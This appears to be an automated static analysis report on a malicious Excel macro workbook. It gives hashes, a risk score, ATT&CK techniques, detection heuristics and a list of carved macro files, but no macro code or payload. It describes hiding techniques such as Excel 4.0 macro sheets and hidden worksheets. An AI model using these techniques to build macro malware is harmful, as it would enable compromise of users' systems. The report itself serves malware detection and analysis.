Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 57f1d49d80f45b1a…

MALICIOUS

Office (OOXML) / .XLSM

47.2 KB Created: 2021-03-30 11:05:02 UTC Authoring application: 16.0300
MD5: f23bbdd3ffed3a2ad012141a74e1670f SHA-1: 6b78ac38574bf5047e90197e2653befbf1d55797 SHA-256: 57f1d49d80f45b1a217c8f83c0877b4d92b338fdddce168071b57375792bd6c2
88 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic for Applications T1059.001 PowerShell

The file is an XLSM document containing VBA macros and an Excel 4.0 macro sheet. The presence of these elements, particularly the Excel 4.0 macro sheet, indicates a high likelihood of malicious code execution. The macros are likely designed to download and execute a secondary payload, a common technique for initial access or further system compromise. Confidence is reduced due to the lack of specific IOCs and the obfuscated nature of the macro content.

Heuristics 4

  • Excel 4.0 macro sheet (1 sheet(s)) critical OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • VBA project inside OOXML medium OOXML_VBA
    Document contains vbaProject.bin — VBA macros present
  • Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET
    Excel workbook contains 1 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/spreadsheetml/2006/main
    • http://schemas.microsoft.com/office/excel/2006/main
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac
    • http://schemas.microsoft.com/office/spreadsheetml/2014/revision
    • http://schemas.microsoft.com/office/spreadsheetml/2015/revision2
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision3
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision6

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
450c01b878e67643071adef3ee10e7e563781cb0ba25a4b2f01a445cfa10dcc5		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2181 bytes
vbaProject_00.bin
cf5dda536b2336481bd2660a8a4b697a78f10980fff2283046d24de3f4a11530		 vba-project OOXML VBA project: xl/vbaProject.bin 19968 bytes
xlm_sheet_00.xml
afc8104838fdd48e32bb26e8c2388ef4ce4fa18f13b1c354d0a2f2c6f773fadc		 xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.xml 1133 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.